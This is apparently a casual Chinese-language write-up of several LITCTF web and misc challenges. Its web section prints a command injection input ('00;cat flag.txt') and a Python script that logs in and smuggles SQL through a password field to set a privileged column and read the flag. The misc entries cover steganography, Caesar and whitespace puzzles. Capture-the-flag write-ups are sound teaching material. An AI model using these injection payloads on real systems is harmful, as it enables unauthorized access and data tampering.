LITCTF部分wp

或许人总是要和生活和解🚬
*
被中学生薄纱的三天

web

My boss left

Username: admin
Password: dGhpcyBpcyBzb21lIGdpYmJlcmlzaCB0ZXh0IHBhc3N3b3Jk

unsecure

password=password123&username=admin
重定向
bp，在http history里能看到flag

Ping Pong

十分钟靶机真的是世界上最离谱的东西
还好这题简单🚬🚬🚬
00;cat flag.txt

amogsus-api

本题感谢potato的帮助🙏🙏🙏
&被嘲笑了()

import requests
url = 'http://litctf.org:31783/signup'
d = {'username': '123', 'password': '123'}
r = requests.post(url, data=d)
print (r.text)

url = 'http://litctf.org:31783/login'
d = {'username': '123', 'password': '123'}
r = requests.post(url, data=d)
token = r.json().get('token')
print (r.text)

url = "http://litctf.org:31783/account"
headers = {'Authorization': f'Bearer {token}'}
r = requests.get(url, headers=headers)
print(r.text)

url = 'http://litctf.org:31783/account/update'
d = {'username': '123', 'password': '123",sus="1"--+', 'sus':1}
r = requests.post(url, data=d,headers=headers)
print (r.text)


url = "http://litctf.org:31783/flag"
r = requests.get(url, headers=headers)
print(r.text)

misc

HelloWorld

凯撒加密

kevin

Stegsolve，Data Extract，R0/G0/B0

amogus

查看exif

• 还以为和它花里胡哨的链接有什么关系呢😅😅😅

Blank and Empty

whitespace
whitespace在线运行,在线工具，在线编译IDE_w3cschool
能解，把报错部分去掉

• syy改成1/0/ ，然后解二进制也可以，还没有乱七八糟的报错干扰

discord and more

discord有一半，开幕式视频大概十几分钟的地方有下一半这样

incredible

复制表格数据>随便开个excel>条件格式>突出显示单元格>大于1

• 要我说谁家M长得和H一个样啊。。？！